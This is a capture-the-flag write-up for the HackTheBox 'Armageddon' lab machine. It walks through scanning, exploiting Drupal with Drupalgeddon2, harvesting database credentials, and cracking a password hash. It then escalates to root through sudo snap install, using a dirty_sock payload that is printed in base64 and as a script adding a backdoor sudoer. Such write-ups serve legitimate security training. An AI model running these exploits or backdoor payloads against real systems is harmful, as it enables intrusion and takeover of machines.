Contents

🕵 HTB-Writeup : ARMAGEDDON

Recon

nmap x rustscan

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
└─$ rustscan -a 10.10.10.233 -b 10000 -- -A -Pn -sV -T5

.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.

Open 10.10.10.233:22
Open 10.10.10.233:80

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 7.4 (protocol 2.0)
80/tcp open  http    syn-ack Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-favicon: Unknown favicon MD5: 1487A9908F898326EBABFFFD2407920D
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 36 disallowed entries  /includes/ /misc/ /modules/ /profiles/ /scripts/  /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt  /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt  /LICENSE.txt /MAINTAINERS.txt /update.php /UPGRADE.txt /xmlrpc.php  /admin/ /comment/reply/ /filter/tips/ /node/add/ /search/  /user/register/ /user/password/ /user/login/ /user/logout/ /?q=admin/  /?q=comment/reply/ /?q=filter/tips/ /?q=node/add/ /?q=search/ _/?q=user/password/ /?q=user/register/ /?q=user/login/ /?q=user/logout/
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Welcome to  Armageddon |  Armageddon

We now know that we are targeted a CentOS Box with a Drupal system installed. Drupal is a free and open-source web content management system written in PHP.

dirbuster

The dirbuster scan offer multiple files and directory. We found a changelog file at http://10.10.10.233/CHANGELOG.txt that give us the version of drupal.

drawing

The box is potentially running a v7.56 Drupal.

Vulnerabilities finding

Running searchsploit, we found multiple exploit affecting that version.

1
2
3
4
5
6
7
8
└─$ searchsploit drupal 7.5                                
-------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                  |  Path
-------------------------------------------------------------------------------- ---------------------------------
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit)        | php/webapps/44557.rb
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC)     | php/webapps/44542.txt
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execu | php/webapps/44449.rb
-------------------------------------------------------------------------------- ---------------------------------

We don’t have an account so we have one exploit left: Drupalgeddon2

Oh it sound like the box name :)

1
2
3
4
└─$ ruby 44449.rb http://10.10.10.233

armageddon.htb>> whoami
apache

We have a shell! We are now connected into apache user.

Local recon

Listing network listening connections.

1
2
3
4
5
6
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN    
  • SMTP
  • MySQL

In the /var/www/html directory we found a .gitignore file. This file may contain paths to sensible files.

1
2
3
4
5
6
7
armageddon.htb>> cat /var/www/html/.gitignore
# Ignore configuration files that may contain sensitive information.
sites/*/settings*.php

# Ignore paths that contain user-generated content.
sites/*/files
sites/*/private

There is an interesting file: /var/www/html/sites/default/settings.php. On this file we can find clear credentials for the mysql server.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
$databases = array (
  'default' => 
  array (
    'default' => 
    array (
      'database' => 'drupal',
      'username' => 'drupaluser',
      'password' => 'CQHEy@9M*m23gBVj',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);

We can get the users table content from the drupal database.

1
2
3
4
5
6
armageddon.htb>> mysql --user=drupaluser --password='CQHEy@9M*m23gBVj' -D drupal -e 'select * from users;'

uid	name	pass	mail	theme	signature	signature_format	created	access	login	status	timezone	language	picture	init	data
0						NULL	0	0	0	0	NULL		0		NULL
1	brucetherealadmin	$S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt	admin@armageddon.eu		filtered_html	1606998756	1607077194	1607076276	1	Europe/London		0	admin@armageddon.eu	a:1:{s:7:"overlay";i:1;}
3	toto	$S$D5e7frSb/371LEqrZhsln.qETnFr.AZEOut7MCytPZPoAoeos0Bw	alt.du-9lbv0xo@yopmail.com			filtered_html	1661977417	0	0	0	Europe/London		0	alt.du-9lbv0xo@yopmail.comNULL

We obtain two users and their password hash:

  • brucetherealadmin:$S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt
  • toto:$S$D5e7frSb/371LEqrZhsln.qETnFr.AZEOut7MCytPZPoAoeos0Bw

Trying to bruteforce brucy hash

1
2
3
4
5
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash

Loaded 1 password hash (Drupal7, $S$ [SHA512 256/256 AVX2 4x])
Press 'q' or Ctrl-C to abort, almost any other key for status
booboo           (?)     

We get his password booboo. We are now able to connect to the website or in SSH with those credentials: brucetherealadmin:booboo

We can get the user flag!

1
2
[brucetherealadmin@armageddon ~]$ cat /home/brucetherealadmin/user.txt 
*************************78ed36c

Path to the privesc

When listing privileges of bruce, we see that he is able to use snap install with root right

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
[brucetherealadmin@armageddon ~]$ sudo -l
Matching Defaults entries for brucetherealadmin on armageddon:
    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset,
    env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR
    USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT
    LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME
    LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User brucetherealadmin may run the following commands on armageddon:
    (root) NOPASSWD: /usr/bin/snap install *

I first search on exploitdb if a privilege escalation from snap exist.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
└─$ searchsploit snapd                  
--------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                       |  Path
--------------------------------------------------------------------- ---------------------------------
snapd < 2.37 (Ubuntu) - 'dirty_sock' Local Privilege Escalation (1)  | linux/local/46361.py
snapd < 2.37 (Ubuntu) - 'dirty_sock' Local Privilege Escalation (2)  | linux/local/46362.py
--------------------------------------------------------------------- ---------------------------------

[brucetherealadmin@armageddon ~]$ snap --version
snap    2.47.1-1.el7
snapd   2.47.1-1.el7

The exploit does not work as it is. We will use the payload set on the script and write it as a snap file.

The payload create a user (dirty_sock), this user will be added to the sudoers group, allowing the user to use the sudo command.

1
2
3
4
5
#!/bin/bash

useradd dirty_sock -m -p '$6$sWZcW1t25pfUdBuX$jWjEZQF2zFSfyGy9LbvG3vFzzHRjXfBYK0SOGfMD1sLyaS97AwnJUs7gDCY.fg19Ns3JwRdDhOcEmDpBVlF9m.' -s /bin/bash
usermod -aG sudo dirty_sock
echo "dirty_sock    ALL=(ALL:ALL) ALL" >> /etc/sudoers

We can write a simple python script that will decode the base64 payload and write it into the file exploit.snap:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
SNAP = ('''
aHNxcwcAAAAQIVZcAAACAAAAAAAEABEA0AIBAAQAAADgAAAAAAAAAI4DAAAAAAAAhgMAAAAAAAD/
/////////xICAAAAAAAAsAIAAAAAAAA+AwAAAAAAAHgDAAAAAAAAIyEvYmluL2Jhc2gKCnVzZXJh
ZGQgZGlydHlfc29jayAtbSAtcCAnJDYkc1daY1cxdDI1cGZVZEJ1WCRqV2pFWlFGMnpGU2Z5R3k5
TGJ2RzN2Rnp6SFJqWGZCWUswU09HZk1EMXNMeWFTOTdBd25KVXM3Z0RDWS5mZzE5TnMzSndSZERo
T2NFbURwQlZsRjltLicgLXMgL2Jpbi9iYXNoCnVzZXJtb2QgLWFHIHN1ZG8gZGlydHlfc29jawpl
Y2hvICJkaXJ0eV9zb2NrICAgIEFMTD0oQUxMOkFMTCkgQUxMIiA+PiAvZXRjL3N1ZG9lcnMKbmFt
ZTogZGlydHktc29jawp2ZXJzaW9uOiAnMC4xJwpzdW1tYXJ5OiBFbXB0eSBzbmFwLCB1c2VkIGZv
ciBleHBsb2l0CmRlc2NyaXB0aW9uOiAnU2VlIGh0dHBzOi8vZ2l0aHViLmNvbS9pbml0c3RyaW5n
L2RpcnR5X3NvY2sKCiAgJwphcmNoaXRlY3R1cmVzOgotIGFtZDY0CmNvbmZpbmVtZW50OiBkZXZt
b2RlCmdyYWRlOiBkZXZlbAqcAP03elhaAAABaSLeNgPAZIACIQECAAAAADopyIngAP8AXF0ABIAe
rFoU8J/e5+qumvhFkbY5Pr4ba1mk4+lgZFHaUvoa1O5k6KmvF3FqfKH62aluxOVeNQ7Z00lddaUj
rkpxz0ET/XVLOZmGVXmojv/IHq2fZcc/VQCcVtsco6gAw76gWAABeIACAAAAaCPLPz4wDYsCAAAA
AAFZWowA/Td6WFoAAAFpIt42A8BTnQEhAQIAAAAAvhLn0OAAnABLXQAAan87Em73BrVRGmIBM8q2
XR9JLRjNEyz6lNkCjEjKrZZFBdDja9cJJGw1F0vtkyjZecTuAfMJX82806GjaLtEv4x1DNYWJ5N5
RQAAAEDvGfMAAWedAQAAAPtvjkc+MA2LAgAAAAABWVo4gIAAAAAAAAAAPAAAAAAAAAAAAAAAAAAA
AFwAAAAAAAAAwAAAAAAAAACgAAAAAAAAAOAAAAAAAAAAPgMAAAAAAAAEgAAAAACAAw'''
               + 'A' * 4256 + '==')

import base64

blob = base64.b64decode(SNAP)
with open("exploit.snap", "wb") as f:
    f.write(blob)
    f.close()

Then we can launch a snap install with root privileges.

1
2
3
4
5
6
[brucetherealadmin@armageddon tmp]$ sudo snap install --dangerous --devmode exploit.snap
dirty-sock 0.1 installed

# checking user presence
[brucetherealadmin@armageddon tmp]$ cat /etc/passwd
dirty_sock:x:1001:1001::/home/dirty_sock:/bin/bash

Our new user is well created, we can now get the flag !

1
2
3
4
5
[brucetherealadmin@armageddon tmp]$ su dirty_sock
Mot de passe : dirty_sock

[dirty_sock@armageddon /]$ sudo cat /root/root.txt
*************************70c28a3

Tags

PHP, Password Reuse, Easy, External, Drupal, Penetration Tester Level 1, CVE Exploitation, CVE-2018-7600, A06:2021-Vulnerable And Outdated Components, Public Vulnerabilities, Weak Credentials, A07:2021-Identification And Authentication Failures, Source Code Review, Clear Text Credentials, Authentication, Password Cracking, Sudo Exploitation